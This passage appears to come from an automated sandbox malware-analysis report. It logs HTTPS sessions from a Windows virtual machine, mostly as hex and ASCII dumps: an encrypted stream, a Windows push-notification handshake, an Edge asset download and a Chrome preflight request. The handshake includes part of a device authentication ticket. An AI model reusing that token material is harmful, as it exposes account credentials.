                                                                                        2024-07-24 05:14:45 UTC16384INData Raw: 56 c6 75 11 82 12 e0 b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2
                                                                                        Data Ascii: Vu,(T$&O7gkD$>U|}mlBxz*BFSzP~|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)|[U35Q
                                                                                        2024-07-24 05:14:45 UTC16384INData Raw: 15 3e 36 a4 6a 67 7e 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8
                                                                                        Data Ascii: >6jg~*B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:*_Gp`n3.e_j;`?ihbE}*Z_"]ya8/b</8iEC>niM*]z_]y]DZgtc>qDX\\M
                                                                                        2024-07-24 05:14:45 UTC16384INData Raw: e5 2e b7 93 a4 b3 90 c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43
                                                                                        Data Ascii: .kp4k@?lk/IyMR\!1Q|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0o*j~~{Y1U}n|?*4>tk,OS]|w}:)y7gg3r#YU]oU~C
                                                                                        2024-07-24 05:14:45 UTC16384INData Raw: df 26 b7 09 e8 f5 8c 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c
                                                                                        Data Ascii: &{M1eIwyfr;Tt5S};PtEr~*uVOLC=A{5__p*tHt|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l
                                                                                        2024-07-24 05:14:45 UTC16384INData Raw: c0 77 d7 f0 0b 75 ef b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e
                                                                                        Data Ascii: wuO n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>
                                                                                        2024-07-24 05:14:45 UTC16384INData Raw: 8f 67 d5 e8 e4 34 eb e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3
                                                                                        Data Ascii: g4,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{O
                                                                                        2024-07-24 05:14:45 UTC16384INData Raw: c8 b1 0e c3 45 a4 cf 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48
                                                                                        Data Ascii: E4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;|.'Ocl7vUh&n{G]%vH
                                                                                        2024-07-24 05:14:45 UTC16384INData Raw: 94 22 1e 7d b0 6a 95 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25
                                                                                        Data Ascii: "}jVG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0*"1OvD#jK_F(Mu,abs&0`K`|'5Z:-#BoFX1-3JESJY(bJX*@D[93&Pq<jy@^2%


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        17192.168.2.64978940.115.3.253443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:46 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4e 54 54 74 44 68 34 41 4c 30 2b 73 66 75 76 79 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 61 66 33 31 35 33 62 66 33 66 35 62 32 35 64 0d 0a 0d 0a
                                                                                        Data Ascii: CNT 1 CON 305MS-CV: NTTtDh4AL0+sfuvy.1Context: 1af3153bf3f5b25d
                                                                                        2024-07-24 05:14:46 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                        2024-07-24 05:14:46 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 4e 54 54 74 44 68 34 41 4c 30 2b 73 66 75 76 79 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 61 66 33 31 35 33 62 66 33 66 35 62 32 35 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4b 39 30 6e 63 6f 55 69 65 6b 6c 39 58 73 7a 46 76 78 72 63 6d 67 61 67 39 48 31 4f 68 71 67 6a 4a 4b 30 42 58 4b 6c 38 55 38 39 70 75 73 67 42 57 39 2f 46 75 50 35 47 35 4a 65 4a 39 7a 46 66 70 54 78 42 6c 62 68 77 62 63 33 4e 6b 52 77 32 47 73 77 61 62 67 59 34 32 4c 71 67 64 54 2b 4b 7a 49 78 6b 44 67 62 59 75 45 70 73
                                                                                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: NTTtDh4AL0+sfuvy.2Context: 1af3153bf3f5b25d<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdK90ncoUiekl9XszFvxrcmgag9H1OhqgjJK0BXKl8U89pusgBW9/FuP5G5JeJ9zFfpTxBlbhwbc3NkRw2GswabgY42LqgdT+KzIxkDgbYuEps
                                                                                        2024-07-24 05:14:46 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4e 54 54 74 44 68 34 41 4c 30 2b 73 66 75 76 79 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 61 66 33 31 35 33 62 66 33 66 35 62 32 35 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: NTTtDh4AL0+sfuvy.3Context: 1af3153bf3f5b25d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                        2024-07-24 05:14:46 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                        Data Ascii: 202 1 CON 58
                                                                                        2024-07-24 05:14:46 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4c 6c 7a 6c 78 35 72 6f 78 6b 6d 39 4c 78 4f 44 74 66 61 5a 73 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                        Data Ascii: MS-CV: Llzlx5roxkm9LxODtfaZsQ.0Payload parsing failed.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.64979313.107.246.404432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:47 UTC478OUTGET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1
                                                                                        Host: edgeassetservice.azureedge.net
                                                                                        Connection: keep-alive
                                                                                        Edge-Asset-Group: ProductCategories
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                        2024-07-24 05:14:48 UTC539INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:48 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 82989
                                                                                        Connection: close
                                                                                        Last-Modified: Thu, 25 May 2023 20:28:02 GMT
                                                                                        ETag: 0x8DB5D5E89CE25EB
                                                                                        x-ms-request-id: 76534db3-a01e-002e-3288-dde8c0000000
                                                                                        x-ms-version: 2009-09-19
                                                                                        x-ms-lease-status: unlocked
                                                                                        x-ms-blob-type: BlockBlob
                                                                                        x-azure-ref: 20240724T051447Z-15b94bb6ff9hzj67et992uy4mg00000001d0000000007qh4
                                                                                        Cache-Control: public, max-age=604800
                                                                                        x-fd-int-roxy-purgeid: 69316365
                                                                                        X-Cache: TCP_MISS
                                                                                        Accept-Ranges: bytes
                                                                                        2024-07-24 05:14:48 UTC15845INData Raw: 0a 22 08 f2 33 12 1d 0a 0c 43 61 72 20 26 20 47 61 72 61 67 65 12 0d 42 65 6c 74 73 20 26 20 48 6f 73 65 73 0a 23 08 d7 2b 12 1e 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 09 41 69 72 20 50 75 6d 70 73 0a 21 08 b8 22 12 1c 0a 0c 43 61 72 20 26 20 47 61 72 61 67 65 12 0c 42 6f 64 79 20 53 74 79 6c 69 6e 67 0a 34 08 c3 35 12 2f 0a 18 47 6f 75 72 6d 65 74 20 46 6f 6f 64 20 26 20 43 68 6f 63 6f 6c 61 74 65 12 13 53 70 69 63 65 73 20 26 20 53 65 61 73 6f 6e 69 6e 67 73 0a 27 08 a4 2c 12 22 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 0d 53 6c 65 65 70 69 6e 67 20 47 65 61 72 0a 21 08 f5 36 12 1c 0a 0d 4c 61 77 6e 20 26 20 47 61 72 64 65 6e 12 0b 48 79 64 72 6f 70 6f 6e 69 63 73 0a 39 08 61 12 35 0a 11 42 6f 6f 6b 73 20 26 20 4d
                                                                                        Data Ascii: "3Car & GarageBelts & Hoses#+Sports & OutdoorsAir Pumps!"Car & GarageBody Styling45/Gourmet Food & ChocolateSpices & Seasonings',"Sports & OutdoorsSleeping Gear!6Lawn & GardenHydroponics9a5Books & M
                                                                                        2024-07-24 05:14:48 UTC16384INData Raw: 20 53 79 73 74 65 6d 20 41 63 63 65 73 73 6f 72 69 65 73 0a 20 08 a2 26 12 1b 0a 10 54 6f 6f 6c 73 20 26 20 48 61 72 64 77 61 72 65 12 07 54 6f 69 6c 65 74 73 0a 2c 08 f3 28 12 27 0a 14 4b 69 74 63 68 65 6e 20 26 20 48 6f 75 73 65 77 61 72 65 73 12 0f 45 6c 65 63 74 72 69 63 20 4d 69 78 65 72 73 0a 21 08 c0 32 12 1c 0a 04 54 6f 79 73 12 14 53 61 6e 64 62 6f 78 20 26 20 42 65 61 63 68 20 54 6f 79 73 0a 35 08 a5 25 12 30 0a 18 47 6f 75 72 6d 65 74 20 46 6f 6f 64 20 26 20 43 68 6f 63 6f 6c 61 74 65 12 14 53 65 61 66 6f 6f 64 20 43 6f 6d 62 69 6e 61 74 69 6f 6e 73 0a 24 08 d7 27 12 1f 0a 10 48 6f 6d 65 20 46 75 72 6e 69 73 68 69 6e 67 73 12 0b 43 61 6b 65 20 53 74 61 6e 64 73 0a 2e 08 a4 28 12 29 0a 14 4b 69 74 63 68 65 6e 20 26 20 48 6f 75 73 65 77 61 72 65
                                                                                        Data Ascii: System Accessories &Tools & HardwareToilets,('Kitchen & HousewaresElectric Mixers!2ToysSandbox & Beach Toys5%0Gourmet Food & ChocolateSeafood Combinations$'Home FurnishingsCake Stands.()Kitchen & Houseware
                                                                                        2024-07-24 05:14:48 UTC16384INData Raw: 20 47 61 72 61 67 65 20 46 6c 6f 6f 72 20 43 61 72 65 0a 25 08 f0 2a 12 20 0a 0f 4f 66 66 69 63 65 20 50 72 6f 64 75 63 74 73 12 0d 50 61 70 65 72 20 50 75 6e 63 68 65 73 0a 2d 08 c1 2c 12 28 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 13 42 69 63 79 63 6c 65 20 41 63 63 65 73 73 6f 72 69 65 73 0a 22 08 a2 27 12 1d 0a 10 48 6f 6d 65 20 46 75 72 6e 69 73 68 69 6e 67 73 12 09 4e 6f 76 65 6c 74 69 65 73 0a 16 08 f3 29 12 11 0a 05 4d 75 73 69 63 12 08 45 78 65 72 63 69 73 65 0a 22 08 8e 31 12 1d 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 08 53 77 69 6d 6d 69 6e 67 0a 26 08 d4 21 12 21 0a 12 42 65 61 75 74 79 20 26 20 46 72 61 67 72 61 6e 63 65 12 0b 4d 61 6b 65 75 70 20 4b 69 74 73 0a 3c 08 a5 2a 12 37 0a 13 4d 75 73 69 63 61
                                                                                        Data Ascii: Garage Floor Care%* Office ProductsPaper Punches-,(Sports & OutdoorsBicycle Accessories"'Home FurnishingsNovelties)MusicExercise"1Sports & OutdoorsSwimming&!!Beauty & FragranceMakeup Kits<*7Musica
                                                                                        2024-07-24 05:14:48 UTC16384INData Raw: 77 6e 20 26 20 47 61 72 64 65 6e 12 05 42 75 6c 62 73 0a 21 08 a3 21 12 1c 0a 12 42 65 61 75 74 79 20 26 20 46 72 61 67 72 61 6e 63 65 12 06 4d 61 6b 65 75 70 0a 2d 08 49 12 29 0a 11 42 6f 6f 6b 73 20 26 20 4d 61 67 61 7a 69 6e 65 73 12 14 42 75 73 69 6e 65 73 73 20 26 20 45 63 6f 6e 6f 6d 69 63 73 0a 23 08 d5 23 12 1e 0a 09 43 6f 6d 70 75 74 69 6e 67 12 11 45 78 70 61 6e 73 69 6f 6e 20 4d 6f 64 75 6c 65 73 0a 2f 08 a2 24 12 2a 0a 0b 45 6c 65 63 74 72 6f 6e 69 63 73 12 1b 43 44 20 50 6c 61 79 65 72 73 20 26 20 53 74 65 72 65 6f 20 53 79 73 74 65 6d 73 0a 1f 08 d4 26 12 1a 0a 10 48 6f 6d 65 20 46 75 72 6e 69 73 68 69 6e 67 73 12 06 51 75 69 6c 74 73 0a 22 08 86 23 12 1d 0a 10 43 6c 6f 74 68 69 6e 67 20 26 20 53 68 6f 65 73 12 09 55 6e 64 65 72 77 65 61 72
                                                                                        Data Ascii: wn & GardenBulbs!!Beauty & FragranceMakeup-I)Books & MagazinesBusiness & Economics##ComputingExpansion Modules/$*ElectronicsCD Players & Stereo Systems&Home FurnishingsQuilts"#Clothing & ShoesUnderwear
                                                                                        2024-07-24 05:14:48 UTC16384INData Raw: 20 4f 75 74 64 6f 6f 72 73 12 0d 53 6c 65 65 70 69 6e 67 20 42 61 67 73 0a 24 08 bd 21 12 1f 0a 12 42 65 61 75 74 79 20 26 20 46 72 61 67 72 61 6e 63 65 12 09 46 72 61 67 72 61 6e 63 65 0a 28 08 63 12 24 0a 11 42 6f 6f 6b 73 20 26 20 4d 61 67 61 7a 69 6e 65 73 12 0f 4d 75 73 69 63 20 4d 61 67 61 7a 69 6e 65 73 0a 1e 08 8a 2b 12 19 0a 0f 4f 66 66 69 63 65 20 50 72 6f 64 75 63 74 73 12 06 52 75 6c 65 72 73 0a 2d 08 a9 33 12 28 0a 09 43 6f 6d 70 75 74 69 6e 67 12 1b 50 72 69 6e 74 65 72 20 50 61 72 74 73 20 26 20 41 74 74 61 63 68 6d 65 6e 74 73 0a 27 08 ef 23 12 22 0a 09 43 6f 6d 70 75 74 69 6e 67 12 15 54 68 69 6e 20 43 6c 69 65 6e 74 20 43 6f 6d 70 75 74 65 72 73 0a 37 08 bc 24 12 32 0a 0b 45 6c 65 63 74 72 6f 6e 69 63 73 12 23 49 6e 73 74 61 6c 6c 61 74
                                                                                        Data Ascii: OutdoorsSleeping Bags$!Beauty & FragranceFragrance(c$Books & MagazinesMusic Magazines+Office ProductsRulers-3(ComputingPrinter Parts & Attachments'#"ComputingThin Client Computers7$2Electronics#Installat
                                                                                        2024-07-24 05:14:48 UTC1608INData Raw: 0c 43 61 72 20 26 20 47 61 72 61 67 65 12 1f 53 6e 6f 77 6d 6f 62 69 6c 65 20 26 20 41 54 56 20 53 6b 69 73 20 26 20 52 75 6e 6e 65 72 73 0a 23 08 a2 21 12 1e 0a 12 42 65 61 75 74 79 20 26 20 46 72 61 67 72 61 6e 63 65 12 08 54 77 65 65 7a 65 72 73 0a 30 08 8e 33 12 2b 0a 0c 50 65 74 20 53 75 70 70 6c 69 65 73 12 1b 50 65 74 20 48 61 62 69 74 61 74 20 26 20 43 61 67 65 20 53 75 70 70 6c 69 65 73 0a 29 08 d4 23 12 24 0a 09 43 6f 6d 70 75 74 69 6e 67 12 17 44 69 67 69 74 61 6c 20 4d 65 64 69 61 20 52 65 63 65 69 76 65 72 73 0a 2a 08 f3 2b 12 25 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 10 42 6f 61 74 20 4d 61 69 6e 74 65 6e 61 6e 63 65 0a 22 08 d7 26 12 1d 0a 10 48 6f 6d 65 20 46 75 72 6e 69 73 68 69 6e 67 73 12 09 46 75 72 6e 69 74 75 72
                                                                                        Data Ascii: Car & GarageSnowmobile & ATV Skis & Runners#!Beauty & FragranceTweezers03+Pet SuppliesPet Habitat & Cage Supplies)#$ComputingDigital Media Receivers*+%Sports & OutdoorsBoat Maintenance"&Home FurnishingsFurnitur


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.649799142.250.186.1424436860C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:49 UTC549OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                        Host: play.google.com
                                                                                        Connection: keep-alive
                                                                                        Accept: */*
                                                                                        Access-Control-Request-Method: POST
                                                                                        Access-Control-Request-Headers: x-goog-authuser
                                                                                        Origin: https://accounts.google.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Site: same-site
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://accounts.google.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-07-24 05:14:49 UTC520INHTTP/1.1 200 OK
                                                                                        Access-Control-Allow-Origin: https://accounts.google.com
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Max-Age: 86400
